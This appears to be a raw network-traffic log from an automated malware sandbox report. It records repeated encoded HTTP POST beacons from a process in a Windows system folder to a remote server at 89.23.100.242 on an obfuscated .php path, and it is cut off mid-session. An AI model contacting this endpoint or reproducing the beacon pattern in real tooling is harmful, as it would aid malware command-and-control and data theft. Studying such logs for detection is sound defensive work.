                                                                                                Jan 10, 2025 07:58:44.735991001 CET2544OUTData Raw: 5c 51 43 55 5b 5e 56 5f 58 5b 57 56 50 5a 5b 5b 55 51 5e 5b 54 5b 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \QCU[^V_X[WVPZ[[UQ^[T[Q]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C823Z(1+<-:"<4+^+"T<3Y+?"C1-8&*'_!/Y.-
                                                                                                Jan 10, 2025 07:58:45.209836006 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:45.294086933 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:45 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                83192.168.2.45009089.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:45.442540884 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:45.798490047 CET2544OUTData Raw: 59 5f 43 54 5b 59 53 57 58 5b 57 56 50 53 5b 5b 55 51 5e 5c 54 5f 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y_CT[YSWX[WVPS[[UQ^\T_Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR';!#Z(>?[/\">.?++4["4Q<,)&=3:'_!/Y.
                                                                                                Jan 10, 2025 07:58:46.219194889 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:46.389796019 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:46 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                84192.168.2.45009189.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:46.524138927 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:46.876611948 CET2544OUTData Raw: 59 54 46 55 5b 5a 53 50 58 5b 57 56 50 5a 5b 51 55 56 5e 5d 54 59 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YTFU[ZSPX[WVPZ[QUV^]TYQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,W#[>-^+5<;:W+= \(("+Q?4=?6B& \':'_!/Y.-
                                                                                                Jan 10, 2025 07:58:47.362629890 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:47.500628948 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:47 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                85192.168.2.45009289.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:47.628360987 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:47.986047029 CET2544OUTData Raw: 5c 56 43 5f 5e 5a 56 52 58 5b 57 56 50 5e 5b 52 55 54 5e 5e 54 5d 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \VC_^ZVRX[WVP^[RUT^^T]Q_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B,?+=(5</:)V?8(0]#4(#))%=4^3*'_!/Y.=
                                                                                                Jan 10, 2025 07:58:48.364654064 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:48.516638994 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:48 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                86192.168.2.45009389.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:48.643476963 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:49.001590014 CET2544OUTData Raw: 59 51 43 52 5b 5d 53 53 58 5b 57 56 50 5c 5b 57 55 55 5e 5f 54 51 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YQCR[]SSX[WVP\[WUU^_TQQRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,!/Z?-.?+/-W>>;<8Z!B(+7)/6G&=/3*'_!/Y.
                                                                                                Jan 10, 2025 07:58:49.397394896 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:49.532780886 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:49 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                87192.168.2.45009489.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:49.660655975 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:50.017247915 CET2544OUTData Raw: 59 5e 43 56 5e 5a 56 5e 58 5b 57 56 50 5c 5b 5a 55 55 5e 59 54 5e 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y^CV^ZV^X[WVP\[ZUU^YT^Q[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,/\+9Z<64Z,)!+.++4X5?U<0>>B1=#0:'_!/Y.


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                88192.168.2.45009589.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:50.226541996 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2024
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:50.579921007 CET2024OUTData Raw: 5c 54 43 57 5e 58 53 53 58 5b 57 56 50 5b 5b 52 55 55 5e 5a 54 5f 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \TCW^XSSX[WVP[[RUU^ZT_Q_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR';23>=>+];9:>>$\?<[6$? )/&$>7&:'_!/Y.-
                                                                                                Jan 10, 2025 07:58:50.990257025 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:51.142091990 CET349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:51 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 1e 39 11 37 05 24 52 24 2c 21 11 3a 01 0c 0f 28 30 34 1d 28 3e 24 02 3d 33 30 0f 2d 3c 37 56 20 3b 2d 15 3f 32 2a 51 27 12 20 57 32 27 21 59 0c 13 26 5f 2b 04 25 54 29 04 24 11 28 57 36 44 30 30 27 5e 24 04 2d 50 20 11 27 07 28 04 25 55 3c 57 2d 10 2e 29 30 5c 2a 2c 2c 1e 30 36 2a 57 0c 1f 25 0a 36 21 2a 0f 22 32 2a 12 24 3b 28 0f 30 38 2f 0f 25 01 38 00 20 14 3f 5b 2e 2a 3b 01 35 00 24 59 28 2d 3d 0e 22 32 09 0b 3f 16 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 9897$R$,!:(04(>$=30-<7V ;-?2*Q' W2'!Y&_+%T)$(W6D00'^$-P '(%U<W-.)0\*,,06*W%6!*"2*$;(08/%8 ?[.*;5$Y(-="2? Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                89192.168.2.45009689.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:50.347024918 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:50.704745054 CET2544OUTData Raw: 59 50 43 51 5e 5a 56 56 58 5b 57 56 50 58 5b 57 55 5c 5e 5e 54 5d 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YPCQ^ZVVX[WVPX[WU\^^T]QYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'D;!8?9>6/9&+4]?8([5$+ 3=*A%.'3*'_!/Y.%
                                                                                                Jan 10, 2025 07:58:51.084093094 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:51.212939978 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:50 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                90192.168.2.45009789.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:51.336992979 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:51.689127922 CET2544OUTData Raw: 5c 53 43 54 5b 5d 53 52 58 5b 57 56 50 5c 5b 56 55 57 5e 5b 54 5e 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \SCT[]SRX[WVP\[VUW^[T^Q^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/W<<&(?;9V(\<8<Z"4? (>/"&[83:'_!/Y.
                                                                                                Jan 10, 2025 07:58:52.103879929 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:52.291888952 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:51 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                91192.168.2.45009889.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:52.427025080 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:52.782845974 CET2544OUTData Raw: 5c 51 43 54 5e 5e 56 57 58 5b 57 56 50 5a 5b 51 55 57 5e 5c 54 5b 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \QCT^^VWX[WVPZ[QUW^\T[QYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,'X(=&</:W?.$+^75(?,+/)1=0:'_!/Y.-
                                                                                                Jan 10, 2025 07:58:53.275991917 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:53.427634954 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:53 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                92192.168.2.45009989.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:53.549983978 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:53.907850027 CET2544OUTData Raw: 59 52 43 5e 5b 5a 56 56 58 5b 57 56 50 52 5b 5a 55 57 5e 5e 54 5b 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YRC^[ZVVX[WVPR[ZUW^^T[QXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'D,]?[2+$Z,:"<>')8]5,+03),6G2=#&:'_!/Y.
                                                                                                Jan 10, 2025 07:58:54.290642977 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:54.429718971 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:54 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                93192.168.2.45010089.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:54.548875093 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:54.907955885 CET2544OUTData Raw: 5c 52 46 57 5b 5c 53 53 58 5b 57 56 50 5c 5b 5b 55 56 5e 5b 54 5d 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \RFW[\SSX[WVP\[[UV^[T]Q^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B/!((2<6;9!+-#+$Z!7(+3#Y>?=%(Y':'_!/Y.
                                                                                                Jan 10, 2025 07:58:55.302866936 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:55.441432953 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:55 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                94192.168.2.45010189.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:55.563723087 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
